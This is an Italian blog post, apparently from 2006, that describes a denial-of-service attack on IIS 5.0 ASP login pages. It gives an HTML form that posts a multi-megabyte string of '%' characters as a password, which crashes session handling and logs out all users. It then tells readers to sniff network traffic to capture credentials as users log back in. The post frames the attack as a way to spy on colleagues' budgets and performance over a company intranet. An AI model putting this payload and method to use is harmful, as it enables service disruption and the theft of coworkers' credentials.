RedTomahawk

In questo blog voglio mostrarvi una serie di attacchi che possono essere sferrati a voi o ai sistemi informatci aziendali. Il WWW è ormai diventata la strada digitale per eccellenza. Come nel mondo reale se gli edifici sono ben protetti potremmo sentirci sicuri all'interno delle nostre "mura domestiche", mentre se lasciamo le porte aperte, prima o poi qualcuno proverà ad entrare.

venerdì, gennaio 13, 2006

IIS DoS

Quante volte avete provato ad accedere a quel sito sull'intranet per spiare le performance o i budget dei vostri colleghi?
Beh, con un sito web aziendale che utilizza ASP con lo Scripting Object Model su una macchina Windows 2000 con IIS 5.0 sar� abbastanza semplice!

L'operazione non è gratis e richiede la combinazione di un paio di semplici tecniche:

  1. Attacco ai moduli dei form.
  2. Sniffing della Rete.

Come fare?
Per prima cosa dovete analizzare i sorgenti della pagina di login della WEB Application, dopodichè dovrete creare una pagina HTML che riporti i moduli interessati dall'autenticazione:




<center>

<form name="thisForm" method="post" action="http://www.victim.com/access/logon.asp">

<input id="user_identify" name="user_id" size="20"
value="HACKER" type="text">

<input id="user_password" name="user_password" size="20"
value="%%%% .... %%%%%%%%%" type="text">

<input type="submit">

</form>

</center>

Per motivi di spazio non ho riportato tutti i %%%% che ho inserito nel campo "user_password", ma per la cronaca, ho avuto risultati con strighe di almeno 2 mega di lunghezza.

Eseguite la POST e IIS farà schizzare CPU e Memoria alle stelle mandando in CRASH la gestione delle variabili sessione con conseguente logout di TUTTI gli utenti.

A questo punto attivate il vostro sniffer ed in gioco è fatto!

Gli utenti si riconnetteranno molto probabilmente tutti insieme e voi potrete sniffare tutte le loro credenziali di autenticazione.


Links to this post:

Crea un link

<< Home

Statistiche sito,contatore visite, counter web invisibile